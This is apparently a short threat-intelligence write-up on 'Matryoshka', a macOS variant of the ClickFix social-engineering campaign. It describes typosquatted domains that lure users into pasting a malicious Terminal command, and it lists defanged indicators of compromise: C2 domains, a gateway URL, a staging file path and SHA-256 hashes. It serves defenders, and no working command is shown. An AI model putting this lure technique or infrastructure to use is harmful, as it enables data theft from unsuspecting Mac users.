A new evolution in the “ClickFix” social engineering campaign targeting macOS users This article explores clickfix style attacks. . This latest variant, dubbed Matryoshka due to its nested obfuscation techniques, uses deceptive tactics to trick victims into executing a malicious Terminal command.

While the ClickFix strategy is not new, Matryoshka introduces stronger evasion methods, making detection more challenging for automated sandboxes and network scanners. Typosquatting and Redirects The infection chain begins with typosquatting, a common tactic where attackers create fake versions of popular websites with slight, often unnoticed misspellings. For example, users trying to visit comparisons.org might mistakenly land on comparisions.org a typosquatted domain targeting macOS users. For businesses and organizations, it’s essential to monitor for suspicious shell activity, particularly fetch-and-execute patterns initiated via Terminal.

Blocking typosquatting domains and monitoring the execution of AppleScripts can also help thwart this type of attack. Type Indicator Context C2 domain barbermoo[. ]xyz Primary command-and-control infrastructure Typosquatting domain comparisions[.

]org Initial redirect (typosquat) Gateway URL macfilesendstream[. ]com/r2/ Traffic distribution / routing Header api-key: 5190ef17… Required for C2 communication (truncated) File path /tmp/osalogging.zip Staging file for stolen data SHA-256 62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90 Observed sample SHA-256 d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338 Wrapper script (rogue.sh) SHA-256 48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09 Inner loader script In Intego, Matryoshka represents a sophisticated evolution of ClickFix-style attacks, highlighting the ongoing threat posed by social engineering tactics and fileless malware. Preventive measures, such as user awareness and network monitoring, remain essential to protecting against such evolving threats.